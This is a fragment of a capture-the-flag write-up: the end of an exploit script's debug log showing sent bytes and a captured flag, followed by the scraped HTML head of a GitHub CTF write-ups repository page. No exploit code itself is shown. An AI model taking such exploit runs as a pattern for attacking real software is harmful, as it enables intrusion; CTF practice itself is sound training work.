40 20 │ ··│@·@·│· ··│··@ │ 00000020 40 01 80 02 20 80 02 80 40 80 08 04 01 80 08 20 │@···│ ···│@···│··· │ 00000030 08 10 01 20 08 02 02 08 20 40 04 00 00 f5 00 00 │··· │····│ @··│····│ 00000040 0a 0a │··│ 00000042[DEBUG] Received 0x2e bytes: b'Process exited with return code 100\n' b'Congrats!\n'[*] Switching to interactive modeCongrats![DEBUG] Received 0x27 bytes: b'utflag{exploit_machine_goes_brrrrrrrr}\n'utflag{exploit_machine_goes_brrrrrrrr}[*] Got EOF while reading in interactive$``` What a cool challenge :)
<html lang="en" data-color-mode="auto" data-light-theme="light" data-dark-theme="dark"> <head> <meta charset="utf-8"> <link rel="dns-prefetch" href="https://github.githubassets.com"> <link rel="dns-prefetch" href="https://avatars.githubusercontent.com"> <link rel="dns-prefetch" href="https://github-cloud.s3.amazonaws.com"> <link rel="dns-prefetch" href="https://user-images.githubusercontent.com/"> <link rel="preconnect" href="https://github.githubassets.com" crossorigin> <link rel="preconnect" href="https://avatars.githubusercontent.com"> <link crossorigin="anonymous" media="all" integrity="sha512-L06pZD/4Yecj8D8pY5aYfA7oKG6CI8/hlx2K9ZlXOS/j5TnYEjrusaVa9ZIb9O3/tBHmnRFLzaC1ixcafWtaAg==" rel="stylesheet" href="https://github.githubassets.com/assets/light-2f4ea9643ff861e723f03f296396987c.css" /><link crossorigin="anonymous" media="all" integrity="sha512-xcx3R1NmKjgOAE2DsCHYbus068pwqr4i3Xaa1osduISrxqYFi3zIaBLqjzt5FM9VSHqFN7mneFXK73Z9a2QRJg==" rel="stylesheet" href="https://github.githubassets.com/assets/dark-c5cc774753662a380e004d83b021d86e.css" /><link data-color-theme="dark_dimmed" crossorigin="anonymous" media="all" integrity="sha512-xlDV9el7Cjd+KTSbwspx+c8its28uxn++hLZ9pqYYo1zOVcpLPlElTo42iA/8gV3xYfLvgqRZ3dQPxHCu4UaOQ==" rel="stylesheet" data-href="https://github.githubassets.com/assets/dark_dimmed-c650d5f5e97b0a377e29349bc2ca71f9.css" /><link data-color-theme="dark_high_contrast" crossorigin="anonymous" media="all" integrity="sha512-jkzjbgytRSAyC4EMcrdpez+aJ2CROSpfemvgO2TImxO6XgWWHNG2qSr2htlD1SL78zfuPXb+iXaVTS5jocG0DA==" rel="stylesheet" data-href="https://github.githubassets.com/assets/dark_high_contrast-8e4ce36e0cad4520320b810c72b7697b.css" /><link data-color-theme="dark_colorblind" crossorigin="anonymous" media="all" integrity="sha512-FzS8HhJ7XSHmx/dBll4FYlvu+8eivvb7jnttZy9KM5plsMkgbEghYKJszrFFauqQvv7ezYdbk7v/d8UtdjG9rw==" rel="stylesheet" data-href="https://github.githubassets.com/assets/dark_colorblind-1734bc1e127b5d21e6c7f741965e0562.css" /><link data-color-theme="light_colorblind" crossorigin="anonymous" media="all" integrity="sha512-IpkvxndMpMcO4paMJl83lYTcy18jv2jqG7mHZnTfr9HRV09iMhuQ/HrE+4mQO2nshL7ZLejO1OiVNDQkyVFOCA==" rel="stylesheet" data-href="https://github.githubassets.com/assets/light_colorblind-22992fc6774ca4c70ee2968c265f3795.css" /> <link crossorigin="anonymous" media="all" integrity="sha512-4hzfg/znP4UxIOUt/r3SNYEZ6jBPJIS6PH4VC26tE0Nd4xAymMC3KXDaC9YITfG4fhyfxuB1YnDHo1H2iUwsfg==" rel="stylesheet" href="https://github.githubassets.com/assets/frameworks-e21cdf83fce73f853120e52dfebdd235.css" /> <link crossorigin="anonymous" media="all" integrity="sha512-sT0AyFLl78shyaRWRXOw8uwRSnR+7tURIXoJwVYadATkrqeWfze5y/tOu8MS1mbzUKl6pgLjfEdT+U8bwBJHfQ==" rel="stylesheet" href="https://github.githubassets.com/assets/behaviors-b13d00c852e5efcb21c9a4564573b0f2.css" /> <link crossorigin="anonymous" media="all" integrity="sha512-jdtbQr5ZSKZqID/c80i87Ml+YyEhYVd5sF9szeR+Xuvbfhi4yLJbEsSllzk0XRzcbWqD4tDtshhRo5IuJx4Mzw==" rel="stylesheet" href="https://github.githubassets.com/assets/github-8ddb5b42be5948a66a203fdcf348bcec.css" /> <script crossorigin="anonymous" defer="defer" integrity="sha512-/0zs/So9AxtDONKx324yW8s62PoPMx4Epxmk1aJmMgIYIKUkQg4YqlZQ06B4j0tSXQcUB8/zWiIkhLtVEozU/w==" type="application/javascript" src="https://github.githubassets.com/assets/environment-ff4cecfd.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-8p4kkx6e3xBq1g3NP0O3/AW/aiTQ+VRxYencIeMD8crx7AEwrOTV+XOL/UE8cw4vEvkoU/zzLEZ9cud0jFfI4w==" type="application/javascript" src="https://github.githubassets.com/assets/chunk-frameworks-f29e2493.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-slE3Aa2Duzwgju0UbTfes+w5slmaEOhXwom+Ev+pPsxxOpeh2CGZqfriJGr6pkhTZX+ffOTTYl3GnSLtp7AkJw==" type="application/javascript" src="https://github.githubassets.com/assets/chunk-vendor-b2513701.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-ZDU7IsI6lFo4eeBuqkrh/Htsa12ZYOi44uBhKqG0LyV6XHM502iJjjsIVnmtmNXrrC9oGMf2O5i57Bx4lwGsXw==" type="application/javascript" src="https://github.githubassets.com/assets/behaviors-64353b22.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-ODZJzCJpaOfusrIka5QVZQcPiO9LBGyrrMYjhhJWSLuCN5WbZ5xiEiiOPOKVu71dqygyRdB2TY7AKPA1J5hqdg==" type="application/javascript" data-module-id="./chunk-unveil.js" data-src="https://github.githubassets.com/assets/chunk-unveil-383649cc.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-emPgUbSwW9ezLCgRnTE7n4fbbfc/MqEEDHmnkmG61dTyjWKHTYKN4wN3OPS7SY0fwmSJ8mB5+gng2nZw4/HsUg==" type="application/javascript" data-module-id="./chunk-animate-on-scroll.js" data-src="https://github.githubassets.com/assets/chunk-animate-on-scroll-7a63e051.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-pWX6rMbTl/ERAhhtbAyXiJzoXFr91jp/mRy2Xk4OpAId3aVFI2X+yI8X3mhbf985F5BRHamuRx20kG62nRtSLQ==" type="application/javascript" data-module-id="./chunk-ref-selector.js" data-src="https://github.githubassets.com/assets/chunk-ref-selector-a565faac.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-GKiNgfnSOtC7SUFIvLZMYoteE7iKDONxzaeovKiziJczuW1P4KMU1KhXeoTv4WEN0ufeXC9ejA8HvgYa+xPAAQ==" type="application/javascript" data-module-id="./chunk-filter-input.js" data-src="https://github.githubassets.com/assets/chunk-filter-input-18a88d81.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-HRWFwpj3BLrXflQCvPbnuXPFjpnti5TtcqJqUx/b6klMyuskNlUBIo+1UT0KVHFdEW/Y9QKjmXlZxhP6z1j5pg==" type="application/javascript" data-module-id="./chunk-edit.js" data-src="https://github.githubassets.com/assets/chunk-edit-1d1585c2.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-GhqHDMwaAgqUsjVyltYVhaaLYy2G887rPRXXNbsdaI+Xm3dh0fbaHLhZns70EjFAEpXBgCAYFYdnlG1IQFmz1A==" type="application/javascript" data-module-id="./chunk-responsive-underlinenav.js" data-src="https://github.githubassets.com/assets/chunk-responsive-underlinenav-1a1a870c.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-gmw7obKL/JEHWPp6zWFh+ynbXUFOidj1DN2aPiTDwP8Gair0moVuDmA340LD84A29I3ZPak19CEiumG+oIiseg==" type="application/javascript" data-module-id="./chunk-tag-input.js" data-src="https://github.githubassets.com/assets/chunk-tag-input-826c3ba1.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-Ao9llFIlj54ApuKf2QLboXukbu2h7MHfMmtYHrrsVe1lprKNLiA0usVcRpvruKhfT5STDuWm/GGmyx8ox27hWQ==" type="application/javascript" data-module-id="./chunk-notification-list-focus.js" data-src="https://github.githubassets.com/assets/chunk-notification-list-focus-028f6594.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-SPWd3rzrxmU6xW6vy1JPWCd+3uWFWmnd0MVGpmw/TpHWUAdLWDqL8kWyC/sBIZJmda4mTtUO1DHJQzAXRSrC+g==" type="application/javascript" data-module-id="./chunk-cookies.js" data-src="https://github.githubassets.com/assets/chunk-cookies-48f59dde.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-MK53GXbb2BPV+ADlEbJbkrvg34WPcAd5RC2nBJhUH1tR/Mjr9xrsf56ptBajfWcIWKRKbqqRtLktgr0wAbB3zw==" type="application/javascript" data-module-id="./chunk-async-export.js" data-src="https://github.githubassets.com/assets/chunk-async-export-30ae7719.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-tw9SApiMkftVBYeb6/VGhEwGNw8tlyBhXc9RVXH4UbCD6u+48uuCMvXf3bxvBdOld0OoYg83SnD2mgJWhdaTiQ==" type="application/javascript" data-module-id="./chunk-premium-runners.js" data-src="https://github.githubassets.com/assets/chunk-premium-runners-b70f5202.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-D576CjzS9sbDqFBJdq0Y6+KVMHXkO6mLFO/GRL1NtoE8jgXjAvmdjoZ4nNMWyDwqbtBHspvupORzE9L+YoBLYQ==" type="application/javascript" data-module-id="./chunk-get-repo-element.js" data-src="https://github.githubassets.com/assets/chunk-get-repo-element-0f9efa0a.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-xhSAO0KtnFAlRqAK+mg8BPj/J334ccvnCmmjmBQBCgZcsoO9teHJSS6oAn3XOWYFsWPU2JehwG7S3OVEbLwdUg==" type="application/javascript" data-module-id="./chunk-color-modes.js" data-src="https://github.githubassets.com/assets/chunk-color-modes-c614803b.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-jitxouuFY6SUcDZV5W3jhadVEIfFBfCQZxfPV3kxNnsWEBzbxMJFp0ccLb7+OlBjSs1zU/MNtuOV6T9Ay7lx4w==" type="application/javascript" data-module-id="./chunk-copy.js" data-src="https://github.githubassets.com/assets/chunk-copy-8e2b71a2.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-Auj2atZZccqguPinFmOL2k1TCzZs/yfMMFF5aMYMB/5miqEN7v4oAFG0o3Np24NOTkJ9o/txZCeuT6NGHgGoUA==" type="application/javascript" data-module-id="./chunk-voting.js" data-src="https://github.githubassets.com/assets/chunk-voting-02e8f66a.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-HDsLJf6gAN+WDFaJneJwmIY82XkZKWqeX7tStBLRh1XM53K8vMV6JZvjq/UQXszaNVWxWcuYtgYTG6ZWo8+QSw==" type="application/javascript" data-module-id="./chunk-confetti.js" data-src="https://github.githubassets.com/assets/chunk-confetti-1c3b0b25.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-zEirtMGIgj3NVAnB8kWhDykK5NLa7q4ugkIxB7EftbovRjhU3X5I/20Rploa4KGPwAR27e36rAljHIsDKbTm/Q==" type="application/javascript" data-module-id="./chunk-codemirror.js" data-src="https://github.githubassets.com/assets/chunk-codemirror-cc48abb4.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-Gr3ZcJt5t73JeBM3NwOEziKyDZ3HpHwzqZL/c1pgTUfo+6QC5f88XXRw/RT6X2diwqvaa3OVFh0oWsZ9ZxhtdQ==" type="application/javascript" data-module-id="./chunk-tip.js" data-src="https://github.githubassets.com/assets/chunk-tip-1abdd970.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-EdQvlnI4Pu5Q6K0HCvp+mi0Vw9ZuwaEuhbnCbmFKX+c0xwiUWY0L3n9P0F6doLhaHhfpvW3718+miL11WG4BeA==" type="application/javascript" data-module-id="./chunk-line.js" data-src="https://github.githubassets.com/assets/chunk-line-11d42f96.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-4zSHP2sQXPKoN9jFy8q2ThHsQNej8s4qhubSR4g0/2dTexAEnoTG+RbaffdIhmjfghGjpS/DlE0cdSTFEOcipQ==" type="application/javascript" data-module-id="./chunk-array.js" data-src="https://github.githubassets.com/assets/chunk-array-e334873f.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-g8fb6U7h9SkWgiK69nfNMn4aN5D2YBYPZUbCIuLpemWoOw8NOaZY8Z0hPq4RUVs4+bYdCFR6K719k8lwFeUijg==" type="application/javascript" data-module-id="./chunk-band.js" data-src="https://github.githubassets.com/assets/chunk-band-83c7dbe9.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-6oWCu7ltWLHlroIRg8mR6RloC1wqKS9aK9e5THWgzaE2GNPAdoC+MLZEYD/TdIiZxsQRev0RInyonsXGBK0aMw==" type="application/javascript" data-module-id="./chunk-toast.js" data-src="https://github.githubassets.com/assets/chunk-toast-ea8582bb.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-miaiZ1xkDsWBUsURHOmeYtbgVKQGnm1octCo/lDXUmPzDyjtubnHULRVw1AK+sttwdwyB0+LOyhIVAWCNSGx+A==" type="application/javascript" data-module-id="./chunk-delayed-loading-element.js" data-src="https://github.githubassets.com/assets/chunk-delayed-loading-element-9a26a267.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-GD25CNhMGDMzEmeFhUT0FILBupAkx5/CHohnYXOP1togy40O0iu/lASaSp3gV8ue0nwscalJVQqR5gKDRHHDVg==" type="application/javascript" data-module-id="./chunk-three.module.js" data-src="https://github.githubassets.com/assets/chunk-three.module-183db908.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-4vVRplWFI7P4m3RHQ0QAhkq6eZUdtIE8PBhsKYJRwDkhQw9iK/U1st1/fM1tQZFuBFwGMyqaZblbWtQ+2ejcqQ==" type="application/javascript" data-module-id="./chunk-slug.js" data-src="https://github.githubassets.com/assets/chunk-slug-e2f551a6.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-Ofk7ddnMsJ6F9d2vCuPQav+FG9Rg8i6WRG2KmbzwT01S9H4y58Fl42zYxDh/lJjOWeSyOB9KJyfIkdpCCTYG9A==" type="application/javascript" data-module-id="./chunk-invitations.js" data-src="https://github.githubassets.com/assets/chunk-invitations-39f93b75.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-vFR+IqThljOLrAWmjhOL/kiQrjgZZg95uPovX0J7kRH5p7Y049LDRZaXLMDijfeqqk71d3MMn9XP5bUcH+lB9w==" type="application/javascript" data-module-id="./chunk-profile.js" data-src="https://github.githubassets.com/assets/chunk-profile-bc547e22.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-FeRujRzXPfs03roBR3mnHvWukfFpu27XbyZPQri9jcCY0AdUWSM5R4drHTJUDQ62Pz/aX0rSS5xORvTu7NsjlQ==" type="application/javascript" data-module-id="./chunk-overview.js" data-src="https://github.githubassets.com/assets/chunk-overview-15e46e8d.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-xqw233932eUGcGURAPuwUWZpC5Km/9Btq7/2Jnkt1rSWnPSVfMl+JKpr9eLtCoQmrpgP8vaghEuX8bWAS8fzTg==" type="application/javascript" data-module-id="./chunk-advanced.js" data-src="https://github.githubassets.com/assets/chunk-advanced-c6ac36df.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-6Rmd0BBAsJ9ouvb/pgrkToMPs5ogcqi8rcQ7R3GDPPHIjlu0NZ0Bx6HUn/aOruMCECETHm4Exfs5gjYdHs66RQ==" type="application/javascript" data-module-id="./chunk-runner-groups.js" data-src="https://github.githubassets.com/assets/chunk-runner-groups-e9199dd0.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-xdGx4qSd2qa0c/AVc4wDqpBhFHasDjOZ5y+MbwuIRA+ar7YxAFhZ2pGFs/+W5hVjSv+BMfKrcWpgLwR3xPIWHA==" type="application/javascript" data-module-id="./chunk-profile-pins-element.js" data-src="https://github.githubassets.com/assets/chunk-profile-pins-element-c5d1b1e2.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-LrD2kFGlUY4JxKVeN3dgYfuhfq0akTPGHtqW0gxkM2sDqVY6pauK2k57tmMHw4TQdcUrs+RQnBc1HPD+ou+ZfQ==" type="application/javascript" data-module-id="./chunk-emoji-picker-element.js" data-src="https://github.githubassets.com/assets/chunk-emoji-picker-element-2eb0f690.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-EvJ2Fip59DXgARNuwTWgjdVqoCjhXQL73SP9yexijlWStKq92sfbKeGK5R4wIP0QOr39WsnW/Kaw3Wpl1QPfog==" type="application/javascript" data-module-id="./chunk-edit-hook-secret-element.js" data-src="https://github.githubassets.com/assets/chunk-edit-hook-secret-element-12f27616.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-W0EihGBOA1mE3orR7s2squ9xVaLXrwd2bOYY9SSslfZHrovrS6KenJU+XXn+CaykddON6/aFEd/FbuQ/FltI9Q==" type="application/javascript" data-module-id="./chunk-insights-query.js" data-src="https://github.githubassets.com/assets/chunk-insights-query-5b412284.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-D/5Ad6jlKQNRPSHbVN5ShlFXOTyRsKbT7O0cWbVHwtOZ/UrwOC5bHKaQFHTq46qeMBbFKyDG+oIdtm5G8NifDA==" type="application/javascript" data-module-id="./chunk-remote-clipboard-copy.js" data-src="https://github.githubassets.com/assets/chunk-remote-clipboard-copy-0ffe4077.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-SUjF5sI77QngAIQUwKJRgZuIM4qggFBMtOZJ3EFS7ecv4uq4BQQJivDVxNBG9api9/rWrpw0d6RzvTCz2GrbdA==" type="application/javascript" data-module-id="./chunk-series-table.js" data-src="https://github.githubassets.com/assets/chunk-series-table-4948c5e6.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-nrfktuuo7BZhPpJxM4fVi62vPbZu6VJZ7ykfarxBExTTDnchXEalCJOq2O3GrVdfWu9cdn9kR/J8+oeTAjdHlA==" type="application/javascript" data-module-id="./chunk-line-chart.js" data-src="https://github.githubassets.com/assets/chunk-line-chart-9eb7e4b6.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-IOMGagwchKC7UeWHK/bV/rO1F1/RZAH0fNNouWV2boLOtE1a9LUbesoRsYK7sz6aFXslPC8fLfow+yWpT1eZzQ==" type="application/javascript" data-module-id="./chunk-stacked-area-chart.js" data-src="https://github.githubassets.com/assets/chunk-stacked-area-chart-20e3066a.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-GohDpVrxfHqlavb8Zabvj+y/s6CHegYwyGpQxKtzR2MkQsynBC98LdLongRFMHI+TKAECLavp200Lsy9JbV5TQ==" type="application/javascript" data-module-id="./chunk-presence-avatars.js" data-src="https://github.githubassets.com/assets/chunk-presence-avatars-1a8843a5.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-TpHTIXhA/2bI21CVmFL1oS3dv+8zveJVZLOVVAZwXNAAI94Hy70L9vT3Q1Vvkyu4Z2gi2iFdy1a53pfYlEDgnQ==" type="application/javascript" data-module-id="./chunk-pulse-authors-graph-element.js" data-src="https://github.githubassets.com/assets/chunk-pulse-authors-graph-element-4e91d321.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-aNAcFMlIdG1ocY5LnZylnN/6KXiJxyPvKg7y1Jnai732wdnrjXazcvNiQkRnj5FY8WP6JRa3K4doCReA4nhj7w==" type="application/javascript" data-module-id="./chunk-stacks-input-config-view.js" data-src="https://github.githubassets.com/assets/chunk-stacks-input-config-view-68d01c14.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-MXXdKvrDUhz9jfXB1/McrPebK8VbV5haYcxcNt5WXgbUym55dZattmCIAK2pJFAD2h4aBUFHo7CzpjmDYf7EkQ==" type="application/javascript" data-module-id="./chunk-community-contributions.js" data-src="https://github.githubassets.com/assets/chunk-community-contributions-3175dd2a.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-eWDdPSTt/NMNFFSNdUSOf36O6AJJepQdiKFtVzHjM5WYpUTAg21zPoyeA4DqfPNL5RggK/+RjWQZzypmNBAH4w==" type="application/javascript" data-module-id="./chunk-discussion-page-views.js" data-src="https://github.githubassets.com/assets/chunk-discussion-page-views-7960dd3d.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-5+v3VN/rhJv/1iAOVphuCGs1FM9eUlSB43CJLw1txGMLvuPNNz/xHQbzTOIW+t2NKFpTnptRvKbuicQ3Jp28UQ==" type="application/javascript" data-module-id="./chunk-discussions-daily-contributors.js" data-src="https://github.githubassets.com/assets/chunk-discussions-daily-contributors-e7ebf754.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-/PSS3erY5t+SZL9B5T6Edgzy2pLD3jx7G/ZqQE+UCPhaaMEEc8Qrhv5XTREOOX0e3DquvxVDDM/KVa6SK/BPcA==" type="application/javascript" data-module-id="./chunk-discussions-new-contributors.js" data-src="https://github.githubassets.com/assets/chunk-discussions-new-contributors-fcf492dd.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-7vazCSTbHAmhDkKepqPuoJu5ZlBV51uKBKdUTiKd5UylsfULxuXr6XtFSZ16eU4TzdMAifa2hR4riO/QRi/9gw==" type="application/javascript" data-module-id="./chunk-tweetsodium.js" data-src="https://github.githubassets.com/assets/chunk-tweetsodium-eef6b309.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-AVKfqEKBF/JCvS2PoakItu304k6gGt9oSMBW2R/eEfGsGuTmC9QeiQw//IJJKFRQdrzpha/FoC/cws9v6dsujQ==" type="application/javascript" data-module-id="./chunk-jump-to.js" data-src="https://github.githubassets.com/assets/chunk-jump-to-01529fa8.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-mQXS2AvjT52IlcDNeeAaWUnOLa3aaGISiApB7zeboZBSILzsVM1ikEJdM7VIaH+xwYYT/D6lqtIwjO1/KVbK2Q==" type="application/javascript" data-module-id="./chunk-user-status-submit.js" data-src="https://github.githubassets.com/assets/chunk-user-status-submit-9905d2d8.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-4xtjUJAtGhsZOLk+SHoir8MWF0vKHoR4tGlR36xsg1kGrE9ftN4BHe21k2TT5jSkqz5x8z7BfZKj/eUuwcZMEQ==" type="application/javascript" data-module-id="./chunk-launch-code-element.js" data-src="https://github.githubassets.com/assets/chunk-launch-code-element-e31b6350.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-NilVxyBbQNJ61v85EVcC3VjOsz5tz+bOlaR1h1R+jIFXNT8VhoalRgPXREht+R3JIZF5fiqkkHZy3+01pX4ZDg==" type="application/javascript" data-module-id="./chunk-metric-selection-element.js" data-src="https://github.githubassets.com/assets/chunk-metric-selection-element-362955c7.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-VtwQp1HbSSWXOsB5a8wzpRH8Bl7/vD0jgBgXsp2K2CTYkhfq/LAWps52SnVQjcRPoB2svCVaJV20hyFuCbGL3w==" type="application/javascript" data-module-id="./chunk-severity-calculator-element.js" data-src="https://github.githubassets.com/assets/chunk-severity-calculator-element-56dc10a7.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-yXHkwiNZgB6O0iSDKE8jrZzTtTyF8YdFFXHcemhWEPuN3sWs1PQrSwEh0Gw4/B9TIzUfvogbqlJ71yLLuqyM+Q==" type="application/javascript" data-module-id="./chunk-readme-toc-element.js" data-src="https://github.githubassets.com/assets/chunk-readme-toc-element-c971e4c2.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-QMvMhJF7+RJNuy+lp8zP+XbKf08Cc36NVOw6CMk0WRGAO1kmoNhTC+FjHB5EBFx/sDurFeYqerS3NGhusJncMA==" type="application/javascript" data-module-id="./chunk-feature-callout-element.js" data-src="https://github.githubassets.com/assets/chunk-feature-callout-element-40cbcc84.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-SyYXfc8EbLO9BnTas69LeNMF6aXITT41QqsFoIuEHHt/0i9+WQAV7ZFBu944TFS7HHFu9eRgmdq1MU/W12Q8xw==" type="application/javascript" data-module-id="./chunk-sortable-behavior.js" data-src="https://github.githubassets.com/assets/chunk-sortable-behavior-4b26177d.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-6JUQHgkTqBaCCdDugMcO4fQ8YxUHk+m6rwVp2Wxa4FMVz6BbBMPOzGluT4wBq8NTUcFv6DnXSOnt5e85jNgpGg==" type="application/javascript" data-module-id="./chunk-drag-drop.js" data-src="https://github.githubassets.com/assets/chunk-drag-drop-e895101e.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-28pipPJZvizfcYYETJWBBeDHsrDEz7A06d7Y5swgY/OWmsX0ZJW6mkZVFRO7Z/xZh1D1qFbPHGNixfCd1YpBnA==" type="application/javascript" data-module-id="./chunk-contributions-spider-graph.js" data-src="https://github.githubassets.com/assets/chunk-contributions-spider-graph-dbca62a4.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-y0yuiXfWuIeCCcUBT1jacp25vWnFCJWgwLM5G1VM4tmCHdoQbiVjvW/vuSuEXUjtS8WwdioTD5hVv9UULiUlww==" type="application/javascript" data-module-id="./chunk-webgl-warp.js" data-src="https://github.githubassets.com/assets/chunk-webgl-warp-cb4cae89.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-3R5+VhOHwJbG+s7VKlj1HjwVKo/RPldgUh98Yed4XMlk1jH7LP20vRYmLUqnvVaZcgx9x9XdWmQWKaBRQfsVvg==" type="application/javascript" src="https://github.githubassets.com/assets/codespaces-dd1e7e56.js"></script><script crossorigin="anonymous" defer="defer" integrity="sha512-tfzZxJCbul4TLTQmD9EJzuvXoLZGUCnWTiuJCGnXlaABfL2eD0I/J/IL9blT+JbF1dQvKi1g/E7396zAKdrZTA==" type="application/javascript" src="https://github.githubassets.com/assets/repositories-b5fcd9c4.js"></script><script crossorigin="anonymous" defer="defer" integrity="sha512-CfJc9iAnfLJnxnvSY41oW/N+iuVSia2CCj/v47XVliM9ACQPKur94EPHnokX0RG8e+FPMhJ2CGy9FfqLYZi4Dg==" type="application/javascript" src="https://github.githubassets.com/assets/topic-suggestions-09f25cf6.js"></script><script crossorigin="anonymous" defer="defer" integrity="sha512-Y9QCffkHDk3/KAoYUMhKeokbNlXWgpO+53XrccRwhUWzMTxEmhnp1ce7OVWP3vOzhCfWaxxnKWW9eVjjny8nRA==" type="application/javascript" src="https://github.githubassets.com/assets/code-menu-63d4027d.js"></script> <meta name="viewport" content="width=device-width"> <title>CTF-Writeups/DVC CTF at main · hugoreb/CTF-Writeups · GitHub</title> <meta name="description" content="Contribute to hugoreb/CTF-Writeups development by creating an account on GitHub."> <link rel="search" type="application/opensearchdescription+xml" href="/opensearch.xml" title="GitHub"> <link rel="fluid-icon" href="https://github.com/fluidicon.png" title="GitHub"> <meta property="fb:app_id" content="1401488693436528"> <meta name="apple-itunes-app" content="app-id=1477376905" /> <meta name="twitter:image:src" content="https://opengraph.githubassets.com/9b3af94ca29e27b61aca33a99dd1f4ad3d64d1346017ead7ed2759e023313b3f/hugoreb/CTF-Writeups" /><meta name="twitter:site" content="@github" /><meta name="twitter:card" content="summary_large_image" /><meta name="twitter:title" content="CTF-Writeups/DVC CTF at main · hugoreb/CTF-Writeups" /><meta name="twitter:description" content="Contribute to hugoreb/CTF-Writeups development by creating an account on GitHub." /> <meta property="og:image" content="https://opengraph.githubassets.com/9b3af94ca29e27b61aca33a99dd1f4ad3d64d1346017ead7ed2759e023313b3f/hugoreb/CTF-Writeups" /><meta property="og:image:alt" content="Contribute to hugoreb/CTF-Writeups development by creating an account on GitHub." /><meta property="og:image:width" content="1200" /><meta property="og:image:height" content="600" /><meta property="og:site_name" content="GitHub" /><meta property="og:type" content="object" /><meta property="og:title" content="CTF-Writeups/DVC CTF at main · hugoreb/CTF-Writeups" /><meta property="og:url" content="https://github.com/hugoreb/CTF-Writeups" /><meta property="og:description" content="Contribute to hugoreb/CTF-Writeups development by creating an account on GitHub." /> <link rel="assets" href="https://github.githubassets.com/"> <meta name="request-id" content="BB3E:E6C5:15C7861:16D2396:61830782" data-pjax-transient="true"/><meta name="html-safe-nonce" content="a928e3759d32217eeb3d0b813ac9ba0d45827e822c26866b1479fee42deed9a0" data-pjax-transient="true"/><meta name="visitor-payload" content="eyJyZWZlcnJlciI6IiIsInJlcXVlc3RfaWQiOiJCQjNFOkU2QzU6MTVDNzg2MToxNkQyMzk2OjYxODMwNzgyIiwidmlzaXRvcl9pZCI6IjEyOTQ3NjYzNDg4MzYyMTA1NjIiLCJyZWdpb25fZWRnZSI6ImZyYSIsInJlZ2lvbl9yZW5kZXIiOiJmcmEifQ==" data-pjax-transient="true"/><meta name="visitor-hmac" content="0da028d4a5709f274fac62b04d0acf888113337130ca9708672b010d55e314a8" data-pjax-transient="true"/> <meta name="hovercard-subject-tag" content="repository:347718098" data-pjax-transient> <meta name="github-keyboard-shortcuts" content="repository,source-code" data-pjax-transient="true" /> <meta name="selected-link" value="repo_source" data-pjax-transient> <meta name="google-site-verification" content="c1kuD-K2HIVF635lypcsWPoD4kilo5-jA_wBFyT4uMY"> <meta name="google-site-verification" content="KT5gs8h0wvaagLKAVWq8bbeNwnZZK1r1XQysX3xurLU"> <meta name="google-site-verification" content="ZzhVyEFwb7w3e0-uOTltm8Jsck2F5StVihD0exw2fsA"> <meta name="google-site-verification" content="GXs5KoUUkNCoaAZn7wPN-t01Pywp9M3sEjnt_3_ZWPc"> <meta name="octolytics-url" content="https://collector.githubapp.com/github/collect" /> <meta name="analytics-location" 